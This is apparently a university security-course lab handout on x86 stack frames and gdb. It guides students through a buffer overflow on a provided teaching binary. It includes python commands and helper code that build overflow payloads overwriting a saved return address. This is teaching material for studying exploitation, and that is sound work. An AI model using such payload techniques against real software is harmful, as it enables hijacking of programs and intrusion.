CS88 Lab 0: C and Assembly Primer

Lab Due Date: Tuesday, September 6, 11:59 PM

Handy References

Lab 0 Goals

Use git to clone a repository full of starter code.
Practice writing C programs and refresh your understanding of the memory layout of a process
Use GDB to identify and access functions, local variables, and function arguments in the stack.
Use GDB to map out function calling conventions and x86 register values.

Overview

This lab is meant to help you explore the basics of reverse engineering and to set you up for more advanced buffer overflow attacks in the following labs. This week we will work through a C program, compile it into assembly, and learn the basics of stack layout.

Figure: The stack growing towards lower addresses and the state maintained within each stack frame.

Recall from CS 31 that the stack data structure is organized into units called frames.

Each stack frame maintains the invariant: %esp, the stack pointer, points to the top of the stack, and %ebp, the base (frame) pointer, points to the bottom of the current frame.
Within each stack frame, we maintain state about the function, including local variables, the previous stack frame's base address (the caller’s frame pointer), the return address (the instruction to resume at in the caller function), and the function arguments.
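As a rough illustration of the layout described above, the sketch below lists where each piece of frame state sits relative to %ebp. It assumes the conventional 32-bit x86 frame (the prologue pushes %ebp, then copies %esp into %ebp) with 4-byte slots. The helper name frame_slots is hypothetical, the example %ebp value is only a sample, and a compiler is free to place locals differently.

```python
# Sketch of a conventional 32-bit x86 stack frame, relative to %ebp.
# Assumes the usual prologue (push %ebp; mov %esp, %ebp) and 4-byte slots.
# frame_slots is a hypothetical helper, not part of the lab code.

WORD = 4  # bytes per stack slot on 32-bit x86


def frame_slots(ebp, num_args=1, num_locals=1):
    """Return {description: address} for the slots around ebp."""
    slots = {}
    # Arguments sit above the return address, at higher addresses.
    for i in reversed(range(num_args)):
        slots["argument %d" % (i + 1)] = ebp + 2 * WORD + i * WORD
    slots["return address (saved eip)"] = ebp + WORD
    slots["caller's saved ebp"] = ebp
    # Locals sit below ebp, at lower addresses (exact placement is compiler-dependent).
    for i in range(num_locals):
        slots["local %d" % (i + 1)] = ebp - (i + 1) * WORD
    return slots


if __name__ == "__main__":
    # Print from higher to lower addresses, the way the stack is usually drawn.
    for name, addr in frame_slots(0xffffd818, num_args=1, num_locals=2).items():
        print("0x%08x  %s" % (addr, name))
```

Comparing this table against the output of info frame and x/20w $esp in gdb is a quick way to check whether a given function actually follows this layout.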

In this lab we will use our understanding of the stack's memory layout to explore how simple stack buffer overflows work.

Lab Requirements

You will be required to:

Understand the memory layout for fib.c and use gdb to answer the questions in lab0-worksheet.adoc.
Guess the secret code on main.c by deploying a basic buffer overflow attack.
Describe how and why your buffer overflow attack works in lab0-worksheet.adoc.

Getting your Lab0 Starting Point Code

Log into CS88 Github for our class and get the ssh-URL to your lab git repository. Follow along with the prompts below to SSH, create a lab directory, and clone your lab repo. For a refresher on getting set up with git, take a look at Git Setup.

# ssh into our lab machines
ssh yourusername@lab.cs.swarthmore.edu

# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd ~/cs88
mkdir labs
cd labs

# clone your lab0 repo into your labs sub-directory
git clone [your-ssh-URL]

# change directory to list its contents
cd lab0-you

# ls should list the following contents
ls
 Makefile README.md lab0-worksheet.adoc fib.c secret main.c

If you have not yet been assigned a github account, please follow the instructions below to access lab0 code and to get started with the lab.

# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd ~/cs88
mkdir labs
cd labs
mkdir lab0-you
cd lab0-you

# copy the starter code into lab0
# USAGE: cp <source> <destination>
$ cp ~chaganti/public/cs88/lab0/*  ./   # <-- the dot means "here" (the current directory)
$ ls
 Makefile README.md lab0-worksheet.adoc main.c secret

Lab-0 Functionality

To get started with the lab run make. You should now see a compiled binary fib along with secret. Run the following command to set executable permissions on secret: chmod +x secret. A successful attack on secret is shown below:

$ ./secret < attack
Enter secret number:
You are so wrong!
You win!

As you work through this lab it will be helpful to have the source code open in the editor of your choice, and a separate terminal window to run gdb.

Your first task is to use gdb to walk through fib and use the references provided on this lab page to answer the questions in lab0-worksheet.adoc. Here are some basic gdb commands to get you started:

gdb fib     #runs gdb debugger on fib.
break main  #sets a breakpoint in main
break 4     #sets a breakpoint on line 4
run         #runs the code and stops at the first breakpoint.

info break #displays a list of breakpoints

Example:
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x0000120e in main at fib.c:17
2       breakpoint     keep y   0x000011ae in f at fib.c:4

disas main #disassembly for main
info reg              #shows all register names and their values
info reg esp ebp eip  #shows the values of specific registers

Example:
esp            0xffffd810          0xffffd810
ebp            0xffffd818          0xffffd818
eip            0x565561ae          0x565561ae <f+17>

info frame      #information about the current frame
help info frame #provides "man" page equivalent for the command.

You can also run a single gdb command in a separate terminal window to view the output of disas. Open a new terminal window and run the following command.

# command to view assembly from functions main and f in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main" -ex "disassemble f"

# command to view assembly from function main in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main"

# command to view assembly from function main in file secret
gdb -batch -ex 'file secret' -ex "disassemble main"

There are many more examples provided in the readings above. Walk through those readings to answer the questions in the worksheet.

Simple Buffer Overflow

Once you are familiar with the workings of fib.c you should be ready to move on to secret.

For the second part of the lab, you are provided with a compiled binary secret whose functions are called by main. Your job is to get to endGame() without losing. To do so, you will have to either provide input that correctly guesses the secret string and the correct secret value or, as a savvy reverse engineering hack, bypass all of the code and force the program to execute endGame.

To see how secret works let’s run it with some arbitrary user input:

$ ./secret
Enter secret number:
1
You are so wrong!

Unfortunately, we don’t have the source code for secret (that would make this task trivial). But we do have main, which calls functions defined in secret. Looking at main, we see that it reads input into a char array buf that is 12 characters long and performs some operations on this buffer before calling endGame.

Naive Approach: Your first task is to use gdb to figure out what the functions getSecretCode and calculateValue do. Use gdb to walk through each function and figure out, at a high level, what it does.
Security Mindset: In this task, you decide to be smarter and find loopholes or vulnerabilities in the code that you can take advantage of to get past the checks to reach endGame and succeed.
- Notice that one of the first instructions in main is the call to scanf. If you type man scanf on the terminal, you will notice that, unless the format string gives a maximum field width, scanf places no limit on the length of the string it reads as input!
- You can now leverage this and try to enter an input to main as a secret number that far exceeds the length of buf and see the results. If you see a segmentation fault you are on the right track! You’ve effectively "overflown" the buffer into neighboring regions of memory (in this case the stack memory located at higher addresses), and corrupted the state of the frame causing the program to SEGFAULT.
  $ ./secret
  Enter secret number:
  1233943249324320948234091238401923874129348710329587495
  You are so wrong!
  Segmentation fault (core dumped)
- Since our goal is not simply to corrupt the program state but to manipulate it to win, we can be slightly smarter about how we add data to our input. We can overflow the stack in such a way that when we reach the saved eip (the return address) on the stack, we overwrite it with the address of endGame.
- To accomplish this, let’s first run secret in gdb with twelve 1s as input. To automate the process of creating such inputs, we can use a python command to help us out: python -c 'print "1"*12' > allOnes.
- In gdb you can redirect this input when you run secret as follows:
  $ gdb secret
  (gdb) break main
  Breakpoint 1 at 0x8048575
  (gdb) run < allOnes
  Breakpoint 1, 0x08048575 in main ()
  (gdb)
  You can now try to put a breakpoint right after the call to scanf to confirm that our input of all 1s is in memory. Hint: Try using the examine command x/20w $esp to view 20 words on the top of the stack.
- Once you figure out the starting address of the array buf, you can calculate the distance from this memory address to the location of the saved eip on the stack. If we manage to overwrite the saved eip so that it points to the location of endGame, then we have successfully launched a buffer overflow attack!
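The distance calculation in the last step can be sketched as follows. This assumes a conventional 32-bit frame in which the saved eip sits 4 bytes above the address held in %ebp. The helper names are hypothetical and the addresses are made-up placeholders, so substitute the values you actually read from gdb.

```python
# Sketch: how far is the saved return address from the start of buf?
# Assumes the saved eip is stored at ebp + 4 (conventional 32-bit x86 frame).
# All addresses below are placeholders; read the real ones from gdb.


def looks_like_ones(word):
    """True if a 32-bit word shown by x/20w is four ASCII '1' characters (0x31 each)."""
    return word == int.from_bytes(b"1111", "little")


def padding_length(buf_addr, ebp):
    """Number of filler bytes needed before the saved return address."""
    saved_eip_addr = ebp + 4
    return saved_eip_addr - buf_addr


if __name__ == "__main__":
    print(looks_like_ones(0x31313131))
    print(padding_length(buf_addr=0xffffd808, ebp=0xffffd818))
```

The first helper is a reminder of what to look for in the x/20w output: a run of 0x31313131 words marks where the 1s landed, and the address of the first such word is the start of buf.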

To place a memory address in our secret number so that it changes the saved eip, we need to account for the fact that x86 CPUs store multi-byte values in little-endian format: the least-significant byte (the "little end") is stored at the lowest address, and the remaining bytes follow in consecutive addresses up to the most-significant byte.

Therefore, if we wanted to store a memory address of 0xabcdefgh (where each letter stands for one hex digit) in our buffer following a string of 1s, we would use the following command: python -c 'print "1"*12 + "\xgh\xef\xcd\xab"' > attack.
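Another way to build the same kind of input is to pack the address with Python's struct module and write raw bytes. This avoids text-encoding surprises: in Python 3, print would encode characters above 0x7f as multi-byte UTF-8. The sketch below is an illustration only. The address 0x0804abcd and the padding length of 12 are placeholders, and build_payload and write_payload are hypothetical helpers.

```python
import struct


def build_payload(padding_len, target_addr):
    """Filler '1' bytes followed by a 32-bit address in little-endian order."""
    return b"1" * padding_len + struct.pack("<I", target_addr)


def write_payload(path, payload):
    """Write the raw bytes plus a newline, which ends the line of input."""
    with open(path, "wb") as f:
        f.write(payload + b"\n")


if __name__ == "__main__":
    # Placeholder values: use the padding and address you found in gdb.
    payload = build_payload(12, 0x0804abcd)
    print(payload)
```

Calling write_payload("attack", payload) would produce a file that can be redirected into the program as in ./secret < attack. The "<I" format requests a 4-byte unsigned integer in little-endian order, so the least-significant byte of the address is written first.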

Miscellaneous hints

Good systems programming and reverse engineering involve the following steps:

1. Use gdb to incrementally walk through your code and provide input.
2. Use a piece of paper to draw out the stack.
3. Locate the addresses on the stack.
4. Repeat step 1.

To rerun the code in gdb, you can simply call run again and let gdb restart the program from the beginning, rather than quitting gdb. This way, your breakpoints are preserved.
You can also change values of variables during execution in gdb using (gdb) set {int}0xfffff = 3.

Grading Rubric

Total: 30 points

10 points for successfully causing a buffer overflow in secret.
20 points for completing the worksheet.

Submitting

Please remove any debugging output prior to submitting.

To submit your code, simply commit your changes locally using git add and git commit. Then run git push while in your lab directory.